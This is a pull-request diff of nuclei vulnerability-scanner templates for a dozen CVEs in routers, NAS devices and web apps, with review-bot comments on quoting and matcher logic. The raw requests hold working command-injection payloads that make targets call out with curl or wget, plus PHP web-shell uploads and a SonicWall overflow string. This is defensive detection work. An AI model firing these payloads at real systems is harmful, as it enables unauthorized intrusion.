Merge pull request #6982 from projectdiscovery/additional-oast-matcher
Additional oast matcherpatch-1
commit
d0681f741b
|
@ -17,25 +17,34 @@ info:
|
||||||
cwe-id: CWE-78
|
cwe-id: CWE-78
|
||||||
tags: cve,cve2018,dasan,gpon,rce,oast,kev
|
tags: cve,cve2018,dasan,gpon,rce,oast,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
POST /GponForm/diag_Form?images/ HTTP/1.1
|
POST /GponForm/diag_Form?images/ HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://{{interactsh-url}}`;busybox wget http://{{interactsh-url}}&ipv=0
|
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0
|
||||||
|
|
||||||
- |
|
- |
|
||||||
POST /GponForm/diag_Form?images/ HTTP/1.1
|
POST /GponForm/diag_Form?images/ HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://{{interactsh-url}}`;wget http://{{interactsh-url}}&ipv=0
|
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0
|
||||||
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/12
|
# Enhanced by mp on 2022/05/12
|
||||||
|
|
|
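Review bot: Both `dest_host=` bodies are only half converted: the backtick-wrapped command now sends the `User-Agent: {{useragent}}` marker through curl, but the `;busybox wget http://{{interactsh-url}}` and `;wget http://{{interactsh-url}}` fallbacks after it still carry no marker. This section also adds `matchers-condition: and` with the new `interactsh_request` matcher, so a callback produced only by the wget branch no longer matches, where it matched before. That could happen on a device that has no curl binary, which cannot be verified from this page. Either give the wget branch the same marker or document the limitation next to the matcher, e.g. `# only the curl callback is correlated; a wget-only callback is ignored`.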
@ -13,6 +13,9 @@ info:
|
||||||
cve-id: CVE-2018-10818
|
cve-id: CVE-2018-10818
|
||||||
tags: cve,cve2018,lg-nas,rce,oast,injection
|
tags: cve,cve2018,lg-nas,rce,oast,injection
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -20,24 +23,26 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
&uid=10; wget http://{{interactsh-url}}
|
&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'
|
||||||
|
|
||||||
- |
|
- |
|
||||||
POST /en/php/usb_sync.php HTTP/1.1
|
POST /en/php/usb_sync.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
&act=sync&task_number=1;wget http://{{interactsh-url}}
|
&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
- type: status
|
- type: word
|
||||||
status:
|
part: interactsh_request
|
||||||
- 200
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/04/26
|
# Enhanced by mp on 2022/04/26
|
||||||
|
|
|
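Review bot: The new `interactsh_request` matcher has no comment, while the matcher above it is annotated `# Confirms the HTTP Interaction`; the same gap appears in every template this commit touches. A one-line annotation would tell maintainers why the check exists, e.g. `part: interactsh_request # Confirms the callback carries this run's random User-Agent`. It would also help to note beside `useragent: '{{rand_base(6)}}'` that the value is the correlation token. This section drops the `status: 200` matcher, so detection now rests on the callback alone.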
@ -16,6 +16,9 @@ info:
|
||||||
cwe-id: CWE-78
|
cwe-id: CWE-78
|
||||||
tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve
|
tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -31,7 +34,7 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://{{interactsh-url}}&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
|
Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
|
||||||
|
|
||||||
cookie-reuse: true
|
cookie-reuse: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
@ -41,6 +44,11 @@ requests:
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
words:
|
words:
|
||||||
|
|
|
@ -16,6 +16,9 @@ info:
|
||||||
cwe-id: CWE-78
|
cwe-id: CWE-78
|
||||||
tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev
|
tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -23,17 +26,23 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: */*
|
Accept: */*
|
||||||
|
|
||||||
C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}`
|
C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`
|
||||||
|
|
||||||
- |
|
- |
|
||||||
POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1
|
POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: */*
|
Accept: */*
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/03/27
|
# Enhanced by mp on 2022/03/27
|
||||||
|
|
|
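Review bot: The second request puts the curl command into the request line with literal spaces, a raw colon and quotes before ` HTTP/1.1`. The old line already had one space; the new one has several, so a server or proxy that splits the request line on whitespace may reject or truncate it, and the AND-ed User-Agent matcher would then never be satisfied. Other templates in this commit encode the same command as `curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`. Using that form here would keep the two consistent; the same applies to the body of the first request, whose Content-Type header is not visible in this hunk.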
@ -17,20 +17,30 @@ info:
|
||||||
cwe-id: CWE-78
|
cwe-id: CWE-78
|
||||||
tags: cve,cve2020,terramaster,rce,oast,mirai,unauth
|
tags: cve,cve2020,terramaster,rce,oast,mirai,unauth
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
|
GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
|
GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/03/27
|
# Enhanced by mp on 2022/03/27
|
||||||
|
|
|
@ -16,6 +16,9 @@ info:
|
||||||
cwe-id: CWE-434
|
cwe-id: CWE-434
|
||||||
tags: cve2020,monitorr,rce,oast,unauth,edb,cve,fileupload,intrusive
|
tags: cve2020,monitorr,rce,oast,unauth,edb,cve,fileupload,intrusive
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -34,7 +37,7 @@ requests:
|
||||||
Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
|
Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
|
||||||
Content-Type: image/gif
|
Content-Type: image/gif
|
||||||
|
|
||||||
GIF89a213213123<?php shell_exec("wget -c http://{{interactsh-url}}");
|
GIF89a213213123<?php shell_exec("curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'");
|
||||||
|
|
||||||
-----------------------------31046105003900160576454225745--
|
-----------------------------31046105003900160576454225745--
|
||||||
|
|
||||||
|
@ -42,10 +45,16 @@ requests:
|
||||||
GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1
|
GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/03/27
|
# Enhanced by mp on 2022/03/27
|
||||||
|
|
|
@ -25,10 +25,25 @@ requests:
|
||||||
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"
|
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"
|
||||||
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol
|
part: interactsh_protocol
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "null"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "application/json"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
# Enhanced by md on 2023/02/01
|
# Enhanced by md on 2023/02/01
|
||||||
|
|
|
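Review bot: The added body matcher `- "null"` is a substring match, so together with `application/json` and `200` it is satisfied by any JSON response that contains a null field, not only by a body that is exactly `null`. Nothing in the hunk explains why `null` is the expected response from `tree.php`. If the intent is the whole body, a `type: dsl` matcher with `- 'trim_space(body) == "null"'` would state it exactly. Otherwise add a comment on the word, e.g. `- "null" # expected body when the remote fetch returns nothing usable`, with the reason confirmed by the author.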
@ -20,6 +20,9 @@ info:
|
||||||
cwe-id: CWE-78
|
cwe-id: CWE-78
|
||||||
tags: cisco,rce,oast,kev,packetstorm,cve,cve2021
|
tags: cisco,rce,oast,kev,packetstorm,cve,cve2021
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -28,7 +31,7 @@ requests:
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
|
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\");print(crypt.crypt(\"')}}
|
||||||
|
|
||||||
- |
|
- |
|
||||||
POST /auth HTTP/1.1
|
POST /auth HTTP/1.1
|
||||||
|
@ -36,16 +39,18 @@ requests:
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
|
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\");print(crypt.crypt(\"')}}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/04/29
|
# Enhanced by mp on 2022/04/29
|
||||||
|
|
|
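Review bot: Both `password=` lines now nest single quotes inside the single-quoted argument of `url_encode('...')`. The `-H 'User-Agent: {{useragent}}'` part closes the helper's string literal early, so the expression will probably not evaluate as intended. This section also removes the `status: 200` matcher and requires the User-Agent marker, so the template would then report nothing at all. curl's `-A {{useragent}}` sets the same header without any quoting and avoids the nesting; the rest of both lines can stay as written.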
@ -16,10 +16,13 @@ info:
|
||||||
cwe-id: CWE-787
|
cwe-id: CWE-787
|
||||||
tags: cve,cve2021,overflow,rce,sonicwall,kev
|
tags: cve,cve2021,overflow,rce,sonicwall,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};?{{repeat("A", 518)}} HTTP/1.1
|
GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat("A", 518)}} HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
attack: clusterbomb
|
attack: clusterbomb
|
||||||
|
@ -30,10 +33,16 @@ requests:
|
||||||
- "%08%b7%06%08" # for 10.2.1.2-24sv
|
- "%08%b7%06%08" # for 10.2.1.2-24sv
|
||||||
- "%64%b8%06%08" # for 10.2.1.1-1[79]sv
|
- "%64%b8%06%08" # for 10.2.1.1-1[79]sv
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/04/29
|
# Enhanced by mp on 2022/04/29
|
||||||
|
|
|
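Review bot: The rewritten request line keeps the `{cmd,arg}` brace form but appends the header with `+` separators, as in `{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'}`. The old `{wget,http://…}` form relied on the comma to separate arguments, and a `+` in a URL path is not normally decoded to a space. The `+-H+…` text therefore most likely stays glued to the URL as a single argument, and any callback will not contain `User-Agent: {{useragent}}`. With `matchers-condition: and` added below, that turns a working check into a silent miss; each curl argument would need to be its own comma-separated element. The new side also drops the `# Confirms the HTTP Interaction` comment from the first matcher.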
@ -15,6 +15,9 @@ info:
|
||||||
cwe-id: CWE-78
|
cwe-id: CWE-78
|
||||||
tags: cve,cve2021,lantronix,rce,oast,cisco
|
tags: cve,cve2021,lantronix,rce,oast,cisco
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -23,7 +26,7 @@ requests:
|
||||||
Authorization: Basic dXNlcjp1c2Vy
|
Authorization: Basic dXNlcjp1c2Vy
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} #
|
ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #
|
||||||
|
|
||||||
- |
|
- |
|
||||||
POST / HTTP/1.1
|
POST / HTTP/1.1
|
||||||
|
@ -31,12 +34,19 @@ requests:
|
||||||
Authorization: Basic YWRtaW46UEFTUw==
|
Authorization: Basic YWRtaW46UEFTUw==
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} #
|
ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/05
|
# Enhanced by mp on 2022/05/05
|
||||||
|
|
|
@ -17,6 +17,9 @@ info:
|
||||||
cwe-id: CWE-434
|
cwe-id: CWE-434
|
||||||
tags: viaware,cve,cve2021,kramer,edb,rce
|
tags: viaware,cve,cve2021,kramer,edb,rce
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -27,13 +30,19 @@ requests:
|
||||||
radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php
|
radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /{{randstr}}.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://{{interactsh-url}}%22)%7D' HTTP/1.1
|
GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'")}' HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/18
|
# Enhanced by mp on 2022/05/18
|
||||||
|
|
|
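Review bot: The new `cmd=` value places `'User-Agent%3a+{{useragent}}'` inside the already single-quoted `rpm --eval '…'` argument. The inner quote ends the outer one and the argument splits at the space after the colon, so the command will most likely fail and the new `interactsh_request` matcher can never be met. The line also now sends `{`, `}` and `"` unencoded in the request target, where the old line used `%7B`, `%7D` and `%22`. An unquoted form such as curl's `-A {{useragent}}`, with the old percent-encoding kept, would avoid both problems. Separately, the first request writes `{{randstr}}.php` under `/var/www/html`, and nothing visible in this section removes it or adds the `intrusive` tag that the Monitorr upload template in this commit carries.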
@ -17,6 +17,9 @@ info:
|
||||||
cwe-id: CWE-94
|
cwe-id: CWE-94
|
||||||
tags: cve,cve2021,tplink,rce,router
|
tags: cve,cve2021,tplink,rce,router
|
||||||
|
|
||||||
|
variables:
|
||||||
|
useragent: '{{rand_base(6)}}'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -30,7 +33,7 @@ requests:
|
||||||
dataBlockSize=64
|
dataBlockSize=64
|
||||||
timeout=1
|
timeout=1
|
||||||
numberOfRepetitions=4
|
numberOfRepetitions=4
|
||||||
host=$(echo 127.0.0.1; wget http://{{interactsh-url}})
|
host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')
|
||||||
X_TP_ConnName=ewan_ipoe_d
|
X_TP_ConnName=ewan_ipoe_d
|
||||||
diagnosticsState=Requested
|
diagnosticsState=Requested
|
||||||
|
|
||||||
|
@ -43,10 +46,16 @@ requests:
|
||||||
|
|
||||||
[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0
|
[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: {{useragent}}"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/02/27
|
# Enhanced by mp on 2022/02/27
|
||||||
|
|